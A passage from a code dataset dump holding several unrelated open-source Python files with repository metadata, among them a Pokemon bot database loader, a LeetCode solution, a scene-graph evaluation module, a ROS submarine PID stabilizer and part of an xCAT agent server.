entry)\n log.info(f\"type_efficacy loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load encounters {len(data['encounters']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['encounters']:\n # log.info(data[key])\n entry['location_id'] = entry['id']\n cmd = \"\"\"INSERT INTO encounters\n (\n location_id,\n encounter_slot_id,\n location_area_id,\n max_level,\n min_level,\n pokemon_id,\n version_id\n ) VALUES (\n :location_id,\n :encounter_slot_id,\n :location_area_id,\n :max_level,\n :min_level,\n :pokemon_id,\n :version_id\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"encounters loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load locations {len(data['location_names']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['location_names']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO locations\n (\n location_id,\n name\n ) VALUES (\n :location_id,\n :name\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"location_names loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load zone_connections {len(data['zone_connections']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['zone_connections']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO zone_connections\n (\n location_id_1,\n location_id_2,\n distance_forward,\n distance_backward\n ) VALUES (\n :location_id_1,\n :location_id_2,\n :distance_forward,\n 
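# Sketch only: with a DB-API cursor such as sqlite3's, the row-at-a-time
# execute() loops in populate() can usually be batched with executemany(),
# which accepts a sequence of mappings for named placeholders. The table and
# rows below are toy stand-ins, not this project's schema module.
import sqlite3

con = sqlite3.connect(":memory:")
cur = con.cursor()
cur.execute("CREATE TABLE types (type_id INTEGER, identifier TEXT)")
rows = [{"type_id": 1, "identifier": "normal"},
        {"type_id": 2, "identifier": "fighting"}]
cur.executemany("INSERT INTO types (type_id, identifier) "
                "VALUES (:type_id, :identifier)", rows)
con.commit()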
:distance_backward\n            )\"\"\"\n        cur.execute(cmd, entry)\n    log.info(f\"zone_connections loaded in {time.time()-t_step:.3f}s\")\n\n    log.info(f\"SQL Population took {time.time()-t_start_sql:.3f}s\")\n    log.info(f\"Total Population took {time.time()-t_start_csv:.3f}s\")\n\n    await sql.commit(now=True)\n\n    log.info(\"Populate writes completed\")\n","repo_name":"EEsDoNotItNow/PokeBot","sub_path":"bot/code/SQL/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":17924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73402923687","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys, os, time\nimport threading\ntry:\n\timport queue\nexcept ImportError:\n\timport Queue as queue\ntry:\n\timport cymysql as mdb\nexcept ImportError:\n\tsys.exit(\"\\nPlease install cymysql for python 3, \\ninformation can be found in INSTALL.txt\\n\")\nimport subprocess\nimport string\nimport lib.info as info\nimport signal\nimport datetime\n\nthreads = 5\nstart_time = time.time()\npathname = os.path.abspath(os.path.dirname(sys.argv[0]))\nconf = info.readConfig()\n\n# create the connection to MySQL\ncon = None\ncon = mdb.connect(host=conf['DB_HOST'], user=conf['DB_USER'], passwd=conf['DB_PASSWORD'], db=conf['DB_NAME'], port=int(conf['DB_PORT']), unix_socket=conf['DB_SOCKET'])\ncon.autocommit(True)\ncur = con.cursor()\n\ncur.execute(\"UPDATE releases SET reqidstatus = -1 WHERE reqidstatus = 0 AND nzbstatus = 1 AND relnamestatus = 1 AND name REGEXP '^\\\\[[[:digit:]]+\\\\]' = 0\")\ncur.execute(\"SELECT r.ID, r.name, g.name groupName FROM releases r LEFT JOIN groups g ON r.groupID = g.ID WHERE relnamestatus = 1 AND nzbstatus = 1 AND reqidstatus = 0 AND r.name REGEXP '^\\\\[[[:digit:]]+\\\\]' = 1 limit 1000\")\ndatas = cur.fetchall()\n\nif not datas:\n\tprint(\"No Work to Process\")\n\tsys.exit()\n\n# close the connection to MySQL\ncur.close()\ncon.close()\n\nmy_queue = queue.Queue()\ntime_of_last_run = time.time()\n\nclass queue_runner(threading.Thread):\n\tdef __init__(self, my_queue):\n\t\tthreading.Thread.__init__(self)\n\t\tself.my_queue = my_queue\n\n\tdef run(self):\n\t\tglobal time_of_last_run\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tmy_id = self.my_queue.get(True, 1)\n\t\t\texcept:\n\t\t\t\tif time.time() - time_of_last_run > 3:\n\t\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tif my_id:\n\t\t\t\t\ttime_of_last_run = time.time()\n\t\t\t\t\tsubprocess.call([\"php\", pathname+\"/../nix_scripts/tmux/bin/requestID.php\", \"\"+my_id])\n\t\t\t\t\ttime.sleep(.05)\n\t\t\t\t\tself.my_queue.task_done()\n\ndef main():\n\tglobal time_of_last_run\n\ttime_of_last_run = time.time()\n\n\tdef signal_handler(signal, frame):\n\t\tsys.exit(0)\n\n\tsignal.signal(signal.SIGINT, signal_handler)\n\n\tif True:\n\t\tprint(\"We will be using a max of %s threads, a queue of %s items\" % (threads, \"{:,}\".format(len(datas))))\n\t\ttime.sleep(2)\n\n\t\t# spawn a pool of worker threads\n\t\tfor i in range(threads):\n\t\t\tp = queue_runner(my_queue)\n\t\t\tp.setDaemon(False)\n\t\t\tp.start()\n\n\t# now load some arbitrary jobs into the queue\n\tfor release in datas:\n\t\tmy_queue.put(\"%s %s %s\" % (release[0], release[1], release[2]))\n\n\tmy_queue.join()\n\n\tprint(\"\\n\")\nif __name__ == 
'__main__':\n\tmain()\n","repo_name":"KurzonDax/nZEDbetter","sub_path":"misc/update_scripts/threaded_scripts/requestid_threaded.py","file_name":"requestid_threaded.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20051853184","text":"'''Given the array favoriteCompanies where favoriteCompanies[i] is the list of favorite companies for the ith person (indexed from 0).\n\nReturn the indices of people whose list of favorite companies is not a subset of any other list of favorite companies. You must return the indices in increasing order.\n\n \n\nExample 1:\n\nInput: favoriteCompanies = [[\"leetcode\",\"google\",\"facebook\"],[\"google\",\"microsoft\"],[\"google\",\"facebook\"],[\"google\"],[\"amazon\"]]\nOutput: [0,1,4] \nExplanation: \nPerson with index=2 has favoriteCompanies[2]=[\"google\",\"facebook\"] which is a subset of favoriteCompanies[0]=[\"leetcode\",\"google\",\"facebook\"] corresponding to the person with index 0. \nPerson with index=3 has favoriteCompanies[3]=[\"google\"] which is a subset of favoriteCompanies[0]=[\"leetcode\",\"google\",\"facebook\"] and favoriteCompanies[1]=[\"google\",\"microsoft\"]. \nOther lists of favorite companies are not a subset of another list, therefore, the answer is [0,1,4].\nExample 2:\n\nInput: favoriteCompanies = [[\"leetcode\",\"google\",\"facebook\"],[\"leetcode\",\"amazon\"],[\"facebook\",\"google\"]]\nOutput: [0,1] \nExplanation: In this case favoriteCompanies[2]=[\"facebook\",\"google\"] is a subset of favoriteCompanies[0]=[\"leetcode\",\"google\",\"facebook\"], therefore, the answer is [0,1].\nExample 3:\n\nInput: favoriteCompanies = [[\"leetcode\"],[\"google\"],[\"facebook\"],[\"amazon\"]]\nOutput: [0,1,2,3]'''\n\nfrom typing import List\nimport collections\n\n# tc: O(n^2) and sc: O(n)\nclass Solution:\n    def peopleIndexes(self, fav: List[List[str]]) -> List[int]:\n        res = []\n        new_fav = sorted(fav, key=lambda x: len(x))\n        '''If A is a subset of B then len(A) <= len(B),\n        so iterate over the lists sorted by length and only compare each\n        list against the equal-or-longer ones to save some iterations'''\n        for i in range(len(new_fav)):\n            flag = True\n            '''Initialize it as a unique list'''\n            for j in range(i+1, len(new_fav)):\n                '''e.g. if len(A) is 2 and the A-B intersection has size 1,\n                then A is not a subset of B; the intersection size must equal len(A)'''\n                if len(set(new_fav[j]).intersection(set(new_fav[i]))) == len(new_fav[i]):\n                    flag = False\n                    break\n\n            if flag:\n                '''add to the result if it is a unique list'''\n                res.append(fav.index(new_fav[i]))\n        res.sort()\n        return res\n\n\nclass Solution:\n    def peopleIndexes(self, favoriteCompanies: List[List[str]]) -> List[int]:\n\n        c = collections.defaultdict(set)\n        f = favoriteCompanies\n        for i in range(len(f)):\n            c[i] = set(f[i])\n        \n\n        ans = []\n        for i in range(len(f)):\n            for key in c:\n                if key == i:\n                    continue\n                if c[i] & c[key] == c[i]:\n                    break\n            else:\n                ans.append(i)\n        return ans\n\n","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"Hashing/Medium/People Whose List of Favorite Companies Is Not a Subset of Another List.py","file_name":"People Whose List of Favorite Companies Is Not a Subset of Another List.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21133265398","text":"import copy\r\nimport os\r\n\r\nimport numpy as np\r\n\r\nfrom .oi_evaluation import eval_rel_results, eval_entites_detection, eval_classic_recall\r\nfrom ..vg.vg_eval import 
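# The intersection-size test in the solution above is equivalent to Python's
# built-in subset operator; a toy check against Example 1 from the problem
# statement (all names below are local to this sketch):
fav = [["leetcode", "google", "facebook"], ["google", "microsoft"],
       ["google", "facebook"], ["google"], ["amazon"]]
sets = [set(x) for x in fav]
res = [i for i, s in enumerate(sets)
       if not any(i != j and s <= t for j, t in enumerate(sets))]
assert res == [0, 1, 4]  # matches the expected output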
save_output\r\n\r\n\r\ndef oi_evaluation(\r\n        cfg,\r\n        dataset,\r\n        predictions,\r\n        output_folder,\r\n        logger,\r\n        iou_types,\r\n        **_\r\n):\r\n    if cfg.MODEL.ROI_RELATION_HEAD.USE_GT_BOX:\r\n        if cfg.MODEL.ROI_RELATION_HEAD.USE_GT_OBJECT_LABEL:\r\n            mode = 'predcls'\r\n        else:\r\n            mode = 'sgcls'\r\n    else:\r\n        mode = 'sgdet'\r\n\r\n    result_str = '\\n' + '=' * 100 + '\\n'\r\n\r\n    result_dict_list_to_log = []\r\n\r\n    predicate_cls_list = dataset.ind_to_predicates\r\n\r\n    groundtruths = []\r\n    # resize predictions to the same scale as the images\r\n    for image_id, prediction in enumerate(predictions):\r\n        img_info = dataset.get_img_info(image_id)\r\n        image_width = img_info[\"width\"]\r\n        image_height = img_info[\"height\"]\r\n        # recover original size which is before transform\r\n        predictions[image_id] = prediction.resize((image_width, image_height))\r\n        gt = dataset.get_groundtruth(image_id, evaluation=True)\r\n        groundtruths.append(gt)\r\n\r\n    save_output(output_folder, groundtruths, predictions, dataset)\r\n\r\n    # eval detection by coco style eval\r\n    if \"bbox\" in iou_types:\r\n        result_str_tmp = ''\r\n        (mAp,\r\n         result_dict_list_to_log,\r\n         result_str_tmp) = eval_entites_detection(mode, groundtruths, dataset, predictions,\r\n                                                  result_dict_list_to_log, result_str_tmp, logger)\r\n        result_str += result_str_tmp\r\n        logger.info(result_str_tmp)\r\n\r\n    if not cfg.MODEL.RELATION_ON:\r\n        return mAp, result_dict_list_to_log\r\n\r\n    result_str_tmp = ''\r\n    result_str_tmp, \\\r\n    result_dict_list_to_log = eval_classic_recall(mode, groundtruths, predictions, predicate_cls_list,\r\n                                                  logger, result_str_tmp, result_dict_list_to_log)\r\n    result_str += result_str_tmp\r\n    logger.info(result_str_tmp)\r\n\r\n\r\n    # transform the initial predictions into OI prediction format\r\n    packed_results = adapt_results(groundtruths, predictions)\r\n\r\n    result_str_tmp = ''\r\n    result_str_tmp, \\\r\n    result_dict = eval_rel_results(\r\n        packed_results, predicate_cls_list, result_str_tmp, logger,\r\n    )\r\n    result_dict_list_to_log.append(result_dict)\r\n\r\n    result_str += result_str_tmp\r\n    logger.info(result_str_tmp)\r\n\r\n\r\n    if output_folder:\r\n        with open(os.path.join(output_folder, \"evaluation_res.txt\"), 'w') as f:\r\n            f.write(result_str)\r\n\r\n    return float(result_dict['w_final_score']), result_dict_list_to_log\r\n\r\n\r\ndef adapt_results(\r\n        groundtruths, predictions,\r\n):\r\n    packed_results = []\r\n    for gt, pred in zip(groundtruths, predictions):\r\n        gt = copy.deepcopy(gt)\r\n        pred = copy.deepcopy(pred)\r\n\r\n        pred_boxlist = pred.convert('xyxy').to(\"cpu\")\r\n        pred_ent_scores = pred_boxlist.get_field('pred_scores').detach().cpu()\r\n        pred_ent_labels = pred_boxlist.get_field('pred_labels').long().detach().cpu()\r\n        pred_ent_labels = pred_ent_labels - 1  # remove the background class\r\n\r\n        pred_rel_pairs = pred_boxlist.get_field('rel_pair_idxs').long().detach().cpu()  # N * R * 2\r\n        pred_rel_scores = pred_boxlist.get_field('pred_rel_scores').detach().cpu()  # N * C\r\n\r\n        sbj_boxes = pred_boxlist.bbox[pred_rel_pairs[:, 0], :].numpy()\r\n        sbj_labels = pred_ent_labels[pred_rel_pairs[:, 0]].numpy()\r\n        sbj_scores = pred_ent_scores[pred_rel_pairs[:, 0]].numpy()\r\n\r\n        obj_boxes = pred_boxlist.bbox[pred_rel_pairs[:, 1], :].numpy()\r\n        obj_labels = pred_ent_labels[pred_rel_pairs[:, 1]].numpy()\r\n        obj_scores = pred_ent_scores[pred_rel_pairs[:, 1]].numpy()\r\n\r\n        prd_scores = pred_rel_scores\r\n\r\n        gt_boxlist = gt.convert('xyxy').to(\"cpu\")\r\n        gt_ent_labels = gt_boxlist.get_field('labels')\r\n        gt_ent_labels = gt_ent_labels 
- 1\r\n\r\n        gt_rel_tuple = gt_boxlist.get_field('relation_tuple').long().detach().cpu()\r\n        sbj_gt_boxes = gt_boxlist.bbox[gt_rel_tuple[:, 0], :].detach().cpu().numpy()\r\n        obj_gt_boxes = gt_boxlist.bbox[gt_rel_tuple[:, 1], :].detach().cpu().numpy()\r\n        sbj_gt_classes = gt_ent_labels[gt_rel_tuple[:, 0]].long().detach().cpu().numpy()\r\n        obj_gt_classes = gt_ent_labels[gt_rel_tuple[:, 1]].long().detach().cpu().numpy()\r\n        prd_gt_classes = gt_rel_tuple[:, -1].long().detach().cpu().numpy()\r\n        prd_gt_classes = prd_gt_classes - 1\r\n\r\n        return_dict = dict(sbj_boxes=sbj_boxes,\r\n                           sbj_labels=sbj_labels.astype(np.int32, copy=False),\r\n                           sbj_scores=sbj_scores,\r\n                           obj_boxes=obj_boxes,\r\n                           obj_labels=obj_labels.astype(np.int32, copy=False),\r\n                           obj_scores=obj_scores,\r\n                           prd_scores=prd_scores,\r\n                           # prd_scores_bias=prd_scores,\r\n                           # prd_scores_spt=prd_scores,\r\n                           # prd_ttl_scores=prd_scores,\r\n                           gt_sbj_boxes=sbj_gt_boxes,\r\n                           gt_obj_boxes=obj_gt_boxes,\r\n                           gt_sbj_labels=sbj_gt_classes.astype(np.int32, copy=False),\r\n                           gt_obj_labels=obj_gt_classes.astype(np.int32, copy=False),\r\n                           gt_prd_labels=prd_gt_classes.astype(np.int32, copy=False))\r\n\r\n        packed_results.append(return_dict)\r\n\r\n    return packed_results\r\n","repo_name":"SHTUPLUS/PySGG","sub_path":"pysgg/data/datasets/evaluation/oi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"74953582247","text":"\nimport sys\nimport os \nimport glob\nimport zipfile\n\ndef main():\n    \"\"\"\n    Compress the many image data/label files produced by the step-3 slicing into a single archive\n    \"\"\"\n\n    condition = \"./data/*.png\"\n\n    png_files = glob.glob(condition)\n    print(png_files)\n\n    with zipfile.ZipFile(\"car_image_angle.zip\", 'w') as my_zip:\n        for file in png_files:\n            my_zip.write(file)\n        # the with-statement closes the archive; no explicit close() is needed\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"ssuzzang/ssingssingcar","sub_path":"hj_label_data_compress.py","file_name":"hj_label_data_compress.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1019882541","text":"#! 
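# Hedged aside on the archive script above: zipfile stores whatever path you
# pass it, so entries built from "./data/*.png" keep the data/ prefix; an
# arcname flattens them. The filenames are the script's own, and the
# flattening itself is an optional choice, not part of the original.
import glob
import os
import zipfile

with zipfile.ZipFile("car_image_angle.zip", "w") as zf:
    for path in glob.glob("./data/*.png"):
        zf.write(path, arcname=os.path.basename(path))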
/usr/bin/env python2\nfrom enum import Enum\nimport math, time\n\nfrom nav_msgs.msg import Odometry\nfrom sub_trajectory.msg import StabilityMode\nfrom geometry_msgs.msg import Wrench, WrenchStamped\nfrom std_msgs.msg import Float64\nfrom dynamic_reconfigure.server import Server\nfrom sub_trajectory.cfg import StabilityConfig\n\nimport tf\nimport rospy\nimport numpy as np\n\ndef rosToArray(msg): #Convert a ros message with 1-4 dimensions into a numpy array\n return np.array([getattr(msg, key) for key in (\"x\", \"y\", \"z\", \"w\") if hasattr(msg, key)])\n\ndef rotateVector(quat, vec):\n\tquat2 = list(vec)\n\tquat2.append(0.0)\n\treturn tf.transformations.quaternion_multiply(\n\t\ttf.transformations.quaternion_multiply(quat, quat2),\n\t\ttf.transformations.quaternion_conjugate(quat)\n\t)[:3]\n\nclass ActiveStabilizer():\n\tdef __init__(self):\n\t\tself.curDepthMode = StabilityMode.off\n\t\tself.curAngleMode = StabilityMode.off\n\t\tself.yawEnabled = False\n\n\t\tself.saveDepth = True\n\t\tself.saveOrientation = True\n\n\t\tself.targetDepth = None\n\t\tself.targetOrientation = None\n\n\t\tself.lastUpdateTime = None\n\n\t\tself.depthVelGain = 1\n\t\tself.depthPosGain = [1, 0, 1]\n\t\tself.depthLastPos = None\n\t\tself.depthIntegratedError = 0\n\t\tself.depthMaxForce = 5\n\n\t\tself.orientVelGain = 1\n\t\tself.orientPosGain = [2, 0, 1]\n\t\tself.orientLastError = None\n\t\tself.orientIntegratedError = np.array([0.0,0.0,0.0],dtype=\"float64\")\n\t\tself.orientMaxForce = 2\n\n\t\tself.reconfigureServer = Server(StabilityConfig, self.reconfigureCallback)\n\n\t\tself.angleModeSubscriber = rospy.Subscriber(\"/thrusters/angleMode\", StabilityMode, self.angleModeCallback, queue_size=1)\n\t\tself.depthModeSubscriber = rospy.Subscriber(\"/thrusters/depthMode\", StabilityMode, self.depthModeCallback, queue_size=1)\n\t\tself.odomSubcriber = rospy.Subscriber(\"/odometry/filtered\",Odometry, self.callback, queue_size=1)\n\n\t\tself.stabilityPublisher = rospy.Publisher(\"/stabilityWrench\", WrenchStamped, queue_size=1)\n\n\t\tself.stabilityWrench = WrenchStamped()\n\t\tself.stabilityWrench.header.frame_id = 'base_link'\n\n\t\tself.setPointPub = rospy.Publisher(\"/setpoint\", Float64, queue_size=10)\n\n\tdef reconfigureCallback(self, config, level):\n\t\tself.depthVelGain = config[\"depth_vel_P\"]\n\t\tself.depthPosGain = [config[\"depth_pos_P\"],\n\t\t\t\t\t\t\tconfig[\"depth_pos_I\"],\n\t\t\t\t\t\t\tconfig[\"depth_pos_D\"]]\n\t\tself.depthMaxForce = config[\"depth_pos_Max\"]\n\t\t\n\t\tself.orientVelGain = config[\"orientation_vel_P\"]\n\t\tself.orientPosGain = [config[\"orientation_pos_P\"],\n\t\t\t\t\t\t\tconfig[\"orientation_pos_I\"],\n\t\t\t\t\t\t\tconfig[\"orientation_pos_D\"]]\n\t\tself.orientMaxForce = config[\"orientation_pos_Max\"]\n\n\t\treturn config\n\n\tdef depthModeCallback(self, msg):\n\t\tself.curDepthMode = msg.mode\n\n\t\tif self.curDepthMode == msg.position:\n\t\t\tself.depthLastPos = None\n\n\t\tif np.isfinite(msg.target.z):\n\t\t\tself.saveDepth = False\n\t\t\tself.targetDepth = msg.target.z\n\t\telif self.curDepthMode != StabilityMode.position:\n\t\t\tself.saveDepth = True\n\n\tdef angleModeCallback(self, msg):\n\t\tself.yawEnabled = msg.yawEnabled\n\t\tself.curAngleMode = msg.mode\n\n\t\tif self.curAngleMode == msg.position:\n\t\t\tself.orientLastError = None\n\t\tif np.isfinite(msg.target.w):\n\t\t\tself.saveOrientation = False\n\t\t\tself.targetOrientation = rosToArray(msg.target)\n\t\tif self.curAngleMode != StabilityMode.position:\n\t\t\tself.saveOrientation = True\n\n\tdef 
callback(self, msg):\n\t\ttimeNow = rospy.get_time()\n\t\t\n\t\t#TODO: How to reset the error integrations?\n\t\tif self.depthLastPos is None or self.curDepthMode is not StabilityMode.position:\n\t\t\tself.depthLastPos = msg.pose.pose.position.z\n\t\t\n\t\tif self.orientLastError is None or self.curAngleMode is not StabilityMode.position:\n\t\t\tself.orientLastError = np.array([0,0,0])\n\t\t\tself.orientIntegratedError = np.array([0.0,0.0,0.0],dtype=\"float64\")\n\n\t\tif self.curDepthMode == StabilityMode.off:\n\t\t\tself.stabilityWrench.wrench.force.x = 0\n\t\t\tself.stabilityWrench.wrench.force.y = 0\n\t\t\tself.stabilityWrench.wrench.force.z = 0\n\t\t\n\t\telif self.curDepthMode == StabilityMode.velocity:\n\t\t\tquat = rosToArray(msg.pose.pose.orientation)\n\t\t\tcounterVec = rotateVector(quat, [0,0,-self.depthVelGain*msg.twist.twist.linear.z])\n\t\t\tself.stabilityWrench.wrench.force.x = counterVec[0]\n\t\t\tself.stabilityWrench.wrench.force.y = counterVec[1]\n\t\t\tself.stabilityWrench.wrench.force.z = counterVec[2]\n\n\t\telif self.curDepthMode == StabilityMode.position:\n\t\t\tif self.saveDepth:\n\t\t\t\tself.targetDepth = msg.pose.pose.position.z\n\t\t\t\tself.saveDepth = False\n\t\t\tself.setPointPub.publish(Float64(self.targetDepth))\n\t\t\terror = msg.pose.pose.position.z - self.targetDepth\n\t\t\t\n\t\t\tproportionalCorrection = -self.depthPosGain[0]*error\n\t\t\tintegralCorrection = 0\n\t\t\tderivativeCorrection = 0\n\t\t\t\n\t\t\t#TODO: Should we actually use the update time for this stuff?\n\t\t\tif self.lastUpdateTime is not None:\n\t\t\t\t#Depth derivative computation\n\t\t\t\tderivativeCorrection = -self.depthPosGain[2] * (msg.pose.pose.position.z - self.depthLastPos) / (timeNow - self.lastUpdateTime)\n\t\t\t\tself.depthLastPos = msg.pose.pose.position.z\n\n\t\t\t\tif self.depthPosGain[1] > 0.0001:\n\t\t\t\t\tself.depthIntegratedError += error * (timeNow - self.lastUpdateTime)\n\t\t\t\tintegralCorrection = -self.depthPosGain[1] * self.depthIntegratedError\n\t\t\t\t#Back-calculation integrator windup prevention\n\t\t\t\tif abs(proportionalCorrection + derivativeCorrection + integralCorrection) > self.depthMaxForce and self.depthPosGain[1] > 0.0001:\n\t\t\t\t\tself.depthIntegratedError = ((-np.sign(error)*self.depthMaxForce) - derivativeCorrection - proportionalCorrection)/-self.depthPosGain[1]\n\t\t\t\tintegralCorrection = -self.depthPosGain[1] * self.depthIntegratedError\n\n\t\t\t#print([ proportionalCorrection, derivativeCorrection, integralCorrection])\t\n\n\t\t\tquat = rosToArray(msg.pose.pose.orientation)\n\t\t\tquat = tf.transformations.quaternion_conjugate(quat)\n\t\t\tcounterVec = rotateVector(quat, [0,0,proportionalCorrection + derivativeCorrection + integralCorrection])\n\t\t\tself.stabilityWrench.wrench.force.x = counterVec[0]\n\t\t\tself.stabilityWrench.wrench.force.y = counterVec[1]\n\t\t\tself.stabilityWrench.wrench.force.z = counterVec[2]\n\n\t\telse:\n\t\t\tself.stabilityWrench.wrench.force.x = 0\n\t\t\tself.stabilityWrench.wrench.force.y = 0\n\t\t\tself.stabilityWrench.wrench.force.z = 0\n\n\t\tif self.curAngleMode == StabilityMode.off:\n\t\t\tself.stabilityWrench.wrench.torque.x = 0\n\t\t\tself.stabilityWrench.wrench.torque.y = 0\n\t\t\tself.stabilityWrench.wrench.torque.z = 0\n\t\t\n\t\telif self.curAngleMode == StabilityMode.velocity:\n\t\t\tself.stabilityWrench.wrench.torque.x = -self.orientVelGain * msg.twist.twist.angular.x\n\t\t\tself.stabilityWrench.wrench.torque.y = -self.orientVelGain * msg.twist.twist.angular.y\n\n\t\t\tif 
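# A standalone sketch of the back-calculation anti-windup used in the PID
# branches above: when the summed P+I+D output would exceed the actuator
# limit, the integral is rewound so the output sits exactly at the limit.
# Gains and the limit are illustrative, not the node's tuned values.
def pid_step(error, last_error, integral, dt,
             kp=1.0, ki=0.1, kd=0.5, limit=5.0):
    integral += error * dt
    p = kp * error
    d = kd * (error - last_error) / dt
    i = ki * integral
    if abs(p + i + d) > limit and ki > 1e-4:
        # back-calculate the integral that puts the output on the limit
        sign = 1.0 if error >= 0 else -1.0
        integral = (sign * limit - p - d) / ki
        i = ki * integral
    return p + i + d, integral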
self.yawEnabled:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = -self.orientVelGain * msg.twist.twist.angular.z\n\t\t\telse:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = 0.0\n\n\t\telif self.curAngleMode == StabilityMode.position:\n\t\t\tif self.saveOrientation:\n\t\t\t\tself.targetOrientation = rosToArray(msg.pose.pose.orientation)\n\t\t\t\tself.saveOrientation = False\n\n\t\t\terror = tf.transformations.quaternion_multiply(\n\t\t\t\tself.targetOrientation,\n\t\t\t\ttf.transformations.quaternion_conjugate(rosToArray(msg.pose.pose.orientation))\n\t\t\t) #Find rotation from current to target position\n\n\t\t\t#TODO: Do we need to transform the error and how\n\t\t\terror = rotateVector(tf.transformations.quaternion_conjugate(rosToArray(msg.pose.pose.orientation)),\n\t\t\t\t\t\t\t\t [error[0], error[1],error[2]])\n\n\t\t\t#rpyError = np.array(tf.transformations.euler_from_quaternion(subLocalError))\n\t\t\trpyError = np.array([error[0], error[1],error[2]])\n\n\t\t\tproportionalCorrection = self.orientPosGain[0]*rpyError\n\t\t\tintegralCorrection = np.array([0,0,0])\n\t\t\tderivativeCorrection = np.array([0,0,0])\n\t\t\t\n\t\t\t#TODO: Should we actually use the update time for this stuff?\n\t\t\tif self.lastUpdateTime is not None:\n\t\t\t\t#Depth derivative computation\n\t\t\t\tderivativeCorrection = self.orientPosGain[2] * (rpyError - self.orientLastError) / (timeNow - self.lastUpdateTime)\n\t\t\t\tself.orientLastError = rpyError\n\t\t\t\tif self.orientPosGain[1] > 0.0001:\n\t\t\t\t\tself.orientIntegratedError += rpyError * (timeNow - self.lastUpdateTime)\n\t\t\t\tintegralCorrection = self.orientPosGain[1] * self.orientIntegratedError\n\t\t\t\t#Back-calculation integrator windup prevention\n\t\t\t\tif self.orientPosGain[1] > 0.0001:\n\t\t\t\t\tfor i in range(3):\n\t\t\t\t\t\tif abs(proportionalCorrection[i] + derivativeCorrection[i] + integralCorrection[i]) > self.orientMaxForce:\n\t\t\t\t\t\t\tself.orientIntegratedError[i] = ((np.sign(rpyError[i])*self.orientMaxForce) - derivativeCorrection[i] - proportionalCorrection[i])/self.orientPosGain[1]\n\t\t\t\t\n\t\t\t\tintegralCorrection = self.orientPosGain[1] * self.orientIntegratedError\n\n\t\t\tself.stabilityWrench.wrench.torque.x = proportionalCorrection[0] + derivativeCorrection[0] + integralCorrection[0]\n\t\t\tself.stabilityWrench.wrench.torque.y = proportionalCorrection[1] + derivativeCorrection[1] + integralCorrection[1]\n\t\t\tif self.yawEnabled:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = proportionalCorrection[2] + derivativeCorrection[2] + integralCorrection[2]\n\t\t\telse:\n\t\t\t\tself.stabilityWrench.wrench.torque.z = 0.0\n\n\t\telse:\n\t\t\tself.stabilityWrench.wrench.torque.x = 0\n\t\t\tself.stabilityWrench.wrench.torque.y = 0\n\t\t\tself.stabilityWrench.wrench.torque.z = 0\n\n\t\tself.stabilityWrench.header.stamp = rospy.Time.now()\n\t\tself.stabilityPublisher.publish(self.stabilityWrench)\n\t\tself.lastUpdateTime = timeNow\n\nif __name__== \"__main__\":\n\trospy.init_node('ActiveStability', anonymous=False)\n\tactStab = ActiveStabilizer()\n\trospy.spin()\n","repo_name":"RoboticsClubatUCF/RoboSub","sub_path":"ucf_sub_catkin_ros/src/sub_trajectory/src/active_stability.py","file_name":"active_stability.py","file_ext":"py","file_size_in_byte":9372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18624372406","text":"# -*- encoding: utf-8 -*-\nfrom __future__ import print_function\nimport json\nimport sys\nimport os\nimport threading\nimport fcntl\nimport 
traceback\nfrom gevent import socket\nfrom gevent.server import StreamServer\nfrom gevent.lock import BoundedSemaphore\nfrom common import utils\nfrom xcatagent import base as xcat_manager\n\nMSG_TYPE = 'message'\nDB_TYPE = 'db'\n#LOCK_FILE = '/var/lock/xcat/agent.lock'\n\n\nclass XCATMessager(utils.Messager):\n def __init__(self, sock):\n self.sock = sock\n self.sem = BoundedSemaphore(1)\n\n def _send(self, d):\n buf = json.dumps(d)\n self.sem.acquire()\n self.sock.sendall(utils.int2bytes(len(buf)) + buf.encode('utf-8'))\n self.sem.release()\n\n def info(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'info', 'data': msg}}\n self._send(d)\n\n def warn(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'warning', 'data': msg}}\n self._send(d)\n\n def error(self, msg, node=''):\n d = {'type': MSG_TYPE, 'msg': {'type': 'error', 'node': node, 'data': msg}}\n self._send(d)\n\n def syslog(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'syslog', 'data': msg}}\n self._send(d)\n\n def info_with_host(self, msg):\n d = {'type': MSG_TYPE, 'msg': {'type': 'info_with_host', 'data': msg}}\n self._send(d)\n\n def update_node_attributes(self, attribute, node, data):\n d = {'type': DB_TYPE, 'attribute': {'name': attribute, 'method': 'set', 'type': 'node', 'node': node, 'value': data}}\n self._send(d)\n\n\nclass Server(object):\n def __init__(self, address, standalone=True, lockfile=None):\n try:\n os.unlink(address)\n except OSError:\n if os.path.exists(address):\n 